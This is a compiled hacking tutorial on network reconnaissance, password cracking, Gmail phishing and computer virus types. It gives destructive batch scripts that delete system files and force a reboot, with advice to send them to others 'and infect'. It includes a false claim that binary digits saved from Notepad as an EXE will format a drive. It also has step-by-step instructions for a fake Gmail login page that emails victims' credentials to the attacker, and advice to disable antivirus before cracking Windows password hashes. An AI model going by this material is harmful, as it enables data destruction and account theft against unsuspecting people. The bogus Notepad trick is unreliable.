-: Network Hacking :-

Network Hacking is generally means gathering information about domain by using tools like
Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot
TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is
alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com

example:- c:/>ping www.google.com

Various attributes used with 'Ping' command and their usage can be viewed by just typing
c:/>ping at the command prompt.

Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local
address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n
Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote
computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.

So, the complete syntax is-
c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21

Tracert :- It is used to trace out the route taken by the certain information i.e. data packets
from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert www.insecure.in

Here "* * * Request timed out." indicates that firewall installed on that system block the
request and hence we can't obtain it's IP address.

various attributes used with tracert command and their usage can be viewed by just typing
c:/>tracert at the command prompt.
The information obtained by using tracert command can be further used to find out exact
operating system running on target system.

-: Format A HDD With Notepad :-

If you think that Notepad is useless then you are wrong because you can now do a lot of things
with the Notepad which you could have never imagined. In this hack I will show you how to
format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz
.. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

-: Password Hacking :-

Password cracking is the process of recovering secret passwords from data that has been stored
in or transmitted by a computer system. A common approach is to repeatedly try guesses for
the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption
function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can
recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords
that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately,
allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert
when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking

programs armed with dictionaries (dictionary based) and the user's personal information.
Not surprisingly, many users choose weak passwords, usually one related to themselves in some
way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen
passwords are readily guessable by programs. Examples of insecure choices include:
* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself,
asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order
of the letters.
and so on....
In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a
single word found in a dictionary, and another 12 percent were a word plus a final digit; two-
thirds of the time that digit was.

A password containing both uppercase & lowercase characters, numbers and special
characters too; is a strong password and can never be guessed.

Check Your Password Strength

3) Default Passwords :- A moderately high number of local and online applications have inbuilt
default passwords that have been configured by programmers during development stages of
software. There are lots of applications running on the internet on which default passwords are
enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive
information. A list containing default passwords of some of the most popular applications is
available on the internet.

Always disable or change the applications' (both online and offline) default username-
password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking
technique. Here an automatic tool is used which tries all possible combinations of available keys
on the keyboard. As soon as correct password is reached it displays on the screen.This
techniques takes extremely long time to complete, but password will surely cracked.

Long is the password, large is the time taken to brute force it.
5) Phishing :- This is the most effective and easily executable password cracking technique
which is generally used to crack the passwords of e-mail accounts, and all those accounts where
secret information or sensitive personal information is stored by user such as social networking
websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the
victim, hoping that the victim gets fooled into entering the account username and password. As
soon as victim click on "enter" or "login" login button this information reaches to the attacker
using scripts or online form processors while the user(victim) is redirected to home page of e-
mail service provider.

Never give reply to the messages which are demanding for your username-password,
urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social
engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder
surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity
management system attacks (such as abuse of Self-service password reset) and compromising
host security.
However, cracking usually designates a guessing attack.

-: Windows-XP Password Cracking :-

Here we use the tool "Cain and Abel" for cracking passwords of any local user/administrator.
First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system.

Make sure that you have disabled the antivirus/firewall running on your system before installing
and throughout this process.

Two most effective techniques used here are "Brute-Force" and "Cryptanalysis".

Brute-Force:- As this techniques takes more time to complete, the attacker prefer this
technique only when there is a hope that the password contain same type of characters or may be
two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should
contain less than 7 characters. Otherwise it takes more time to crack password, which may be the
mixture of all types of characters along with special symbols.
The step-by-step explaination for this technique is given below-

1) Open the tool "Cain and Abel"

2) Go into the category "Cracker" it displays all sub-categories under "Cracker"
in left panel.
3) Select "LM & NTLM Hashes" from left panel and then click on symbol, you will be
greeted by a window as shown.
4) Check "import hashes from local system" and then click "Next". This shows all the active
accounts on local system like administrator, guest, etc. along with LM and NT hashed values of
their respective passwords, as shown below.
5) Right clicking on any username shows all available options using which we can crack it's
password.
6) Here we select "Brute-Force Attack" and then "NTLM Hashes", since windows uses NTLM
hashes to store local users' passwords.

7) You will be greeted by a window where you can modify properties for brute-force attack such
as password length, character set, etc.
8) Click on "Start" button.

9) On completion it will reveal the exact password.

 -: Windows-XP Password Cracking :-

Cryptanalisys :- Basically, Cryptanalisys means Operations performed in converting

encrypted messages to plain text without initial knowledge of the crypto-algorithm and/or key
employed in the encryption.
This is the fastest technique of password cracking possible due to "Rainbow Tables".
A rainbow table is a file that is used to lookup an unknown plaintext from a known hash for an
algorithm that does not usually permit this operation.
Steps 1 to 4 i.e upto importing hashes from local system, are similar to previous technique (i.e
brute-force). The steps coming after that are as follows-

5) Here, select "cryptanalisys attack" then "NTLM hashes" and then select "via rainbow tables".
Here we can choose either OphCrack or RainbowCrack formats of tables. The rainbow tables are
available free to download on internet.
Due to large file size of rainbow tables (350MB - 3GB); instead of downloading we can also
create at own just by downloading rainbow table generator (winrtgen.zip of 181KB) free
download at "http://www.oxid.it/downloads/winrtgen.zip"
6) Click on "Add Table"
7) Browse for the location of rainbow table on your system, select proper table and click "open".
8) Select the loaded table and then click on "Start" button.
9) On completetion it will show the exact password.
 To learn windows password cracking techniques properly, one must understand "LM"
& "NTLM" algorithms, SAM File, Dumping NTLM hashes from local SAM, Rainbow
Tables, etc.......!

-: Cracking GMail Account Password :-

Here is the most effective technique for cracking GMail Accounts Passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :- 90%

Step-1 : Create your own fake gmail login form using HTML, which may look like one as
shown below-
 The HTML code for above login screen created by me is given below-

<html lang="en" dir="ltr">

<head>
<meta http-equiv="Content-Type" content="text/html;
charset=UTF-8">
<style type=text/css>
<!--

Step-2 : We require a form processor to process this fake login form, i.e. to store the username
and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to
the predefined e-mail address.
This can be done in two ways-

1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register
with www.formmail.com and configure your fake gmail login form to be processed by
formmail.com . The configuration is different for each formmail account. Which may be
something like following-
 Your form must start w ith the follow ing <form
<form method="POST" action="http://fp1.form
You must also include the follow ing hidden c
in your form so that formmail.com know s w

OR

2) If you are having your own domain hosted on some server; knowing the basics of ASP for
processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page)
for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp'
files to your server.

Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are
ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address,
hoping that the victim gets fooled into entering the account username and password and click on
'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to
victim.

As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg.
http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by
formmail.com .
That's It............!

Done.......?

-: Computer Viruses :-

What is a Computer Virus ?

A potentially damaging computer programme capable of reproducing itself causing great harm
to files or other programs without permission or knowledge of the user.
Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk
or the floppy drive. The boot record program responsible for the booting of operating system is
replaced by the virus. The virus either copies the master boot program to another part of the hard
disk or overwrites it. They infect a computer when it boots up or when it accesses the infected
floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-
write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the
memory and perform predefined functions to infect the system. They infect program files with
extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different
target platforms, and remains recursively infective in each target. It attempts to attack both the
boot sector and the executable, or programs, files at the same time. When the virus attaches to
the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it
will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not
eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for
hiding themselves to avoid detection. They sometimes remove themselves from the memory
temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an
antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean
image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they
change the viral code known as the signature each time they spread or infect. Thus an antivirus
program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or
similar application and causes a sequence of actions to be performed automatically when the
application is started or something else triggers it. Macro viruses tend to be surprising but
relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are
Concept Virus and Melissa Worm.

ShareThis